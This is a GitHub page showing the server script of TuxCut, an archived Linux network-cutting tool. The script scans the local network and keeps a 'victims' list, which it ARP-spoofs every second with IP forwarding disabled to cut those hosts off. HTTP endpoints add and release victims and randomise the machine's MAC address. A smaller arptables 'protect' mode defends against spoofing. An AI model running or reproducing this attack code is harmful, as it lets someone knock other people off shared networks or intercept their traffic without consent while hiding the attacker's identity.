This repository was archived by the owner on Nov 30, 2024. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 55
/
Copy pathtuxcutd.py
221 lines (182 loc) · 5.77 KB
/
tuxcutd.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
import sys
import datetime as dt
import json
import atexit
from setproctitle import setproctitle
import logging
import subprocess as sp
import netifaces
from scapy.all import *
from bottle import route, run
from bottle import request, response
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.triggers.interval import IntervalTrigger
from utils import logger
from utils import get_default_gw, get_my, get_hostname, generate_mac
from utils import enable_ip_forward, disable_ip_forward, arp_spoof, arp_unspoof
setproctitle('tuxcut-server')
victims = list()
def attack_victims():
if len(victims) > 0:
disable_ip_forward()
for victim in victims:
arp_spoof(victim)
scheduler = BackgroundScheduler()
scheduler.start()
scheduler.add_job(
func=attack_victims,
trigger=IntervalTrigger(seconds=1),
id='arp_attack_job',
name='ARP Spoofing the victim list',
replace_existing=True)
# Shut down the scheduler when exiting the app
def on_server_exit():
logger.info('TuxCut server is stopped')
enable_ip_forward()
scheduler.shutdown()
atexit.register(on_server_exit)
@route('/status')
def server_status():
"""
check if server is running
"""
response.headers['Content-Type'] = 'application/json'
return json.dumps({
'status': 'success',
'msg': 'TuxCut server is running'
})
@route('/my/<iface>')
def get_my_info(iface):
"""
find the IP and MAC addressess for the given interface
"""
response.headers['Content-Type'] = 'application/json'
my = get_my(iface)
return json.dumps({
'status': 'success',
'my': my
})
@route('/gw')
def get_gw():
"""
Get the default gw ip address with the iface
"""
response.headers['Content-Type'] = 'application/json'
gw = get_default_gw()
if gw:
return json.dumps({
'status': 'success',
'gw': gw
})
else:
logger.info('No valid internet Connection')
return json.dumps({
'status': 'error',
'msg': 'This computer is not connected'
})
@route('/scan/<gw_ip>')
def scan(gw_ip):
response.headers['Content-Type'] = 'application/json'
live_hosts = list()
logger.info('Start scanning {}'.format(gw_ip))
ans, unans = arping('{}/24'.format(gw_ip), verbose=False)
logger.info('ans: {}'.format(ans))
logger.info('unans: {} '.format(unans))
for i in range(0, len(ans)):
live_hosts.append({
'ip': ans[i][1].psrc,
'mac': ans[i][1].hwsrc,
'hostname': get_hostname(ans[i][1].psrc)
})
logger.info('live hosts: {}'.format(live_hosts))
return json.dumps({
'result': {
'status': 'success',
'hosts': live_hosts
}
})
@route('/protect', method='POST')
def enable_protection():
response.headers['Content-Type'] = 'application/json'
gw_ip = request.forms.get('ip')
gw_mac = request.forms.get('mac')
try:
sp.Popen(['arptables', '-F'])
sp.Popen(['arptables', '-P', 'INPUT', 'DROP'])
sp.Popen(['arptables', '-P', 'OUTPUT', 'DROP'])
sp.Popen(['arptables', '-A', 'INPUT', '-s', gw_ip, '--source-mac', gw_mac, '-j', 'ACCEPT'])
sp.Popen(['arptables', '-A', 'OUTPUT', '-d', gw_ip, '--destination-mac', gw_mac, '-j', 'ACCEPT'])
sp.Popen(['arp', '-s', gw_ip, gw_mac ])
return json.dumps({
'status': 'success',
'msg': 'Protection Enabled'
})
except Exception as e:
logger.error(sys.exc_info()[1], exc_info=True)
return json.dumps({
'status': 'error',
'msg': sys.exc_info()[1]
})
@route('/unprotect')
def disable_protection():
response.headers['Content-Type'] = 'application/json'
try:
sp.Popen(['arptables', '-P', 'INPUT', 'ACCEPT'])
sp.Popen(['arptables', '-P', 'OUTPUT', 'ACCEPT'])
sp.Popen(['arptables', '-F'])
return json.dumps({
'status': 'success',
'msg': 'Protection Disabled'
})
except Exception as e:
logger.error(sys.exc_info()[1], exc_info=True)
return json.dumps({
'status': 'error',
'msg': sys.exc_info()[1]
})
@route('/cut', method='POST')
def add_to_victims():
response.headers['Content-Type'] = 'application/json'
new_victim = request.json
if new_victim not in victims:
victims.append(new_victim)
return json.dumps({
'status': 'success',
'msg': 'new victim add'
})
@route('/resume', method='POST')
def resume_victim():
response.headers['Content-Type'] = 'application/json'
victim = request.json
if victim in victims:
victims.remove(victim)
arp_unspoof(victim)
return json.dumps({
'status': 'success',
'msg': 'victim resumed'
})
@route('/change-mac/<iface>')
def scan(iface):
response.headers['Content-Type'] = 'application/json'
logger.info('Changing MAC Address for interface {}'.format(iface))
new_MAC = generate_mac()
try:
# sp.Popen(['ifconfig', iface, 'down'], stdout=sp.PIPE)
sp.Popen(['ifconfig', iface, 'down', 'hw', 'ether', new_MAC], stdout=sp.PIPE)
sp.Popen(['ifconfig', iface, 'up'], stdout=sp.PIPE)
logger.info('MAC Address for interface {} Changed to {}'.format(iface, new_MAC))
return json.dumps({
'result': {
'status': 'success'
}
})
except Exception as e:
logger.error(sys.exc_info()[1], exc_info=True)
return json.dumps({
'result': {
'status': 'failed'
}
})
if __name__ == '__main__':
run(host='127.0.0.1', port=8013, reloader=True)
logger.info('TuxCut server successfully started')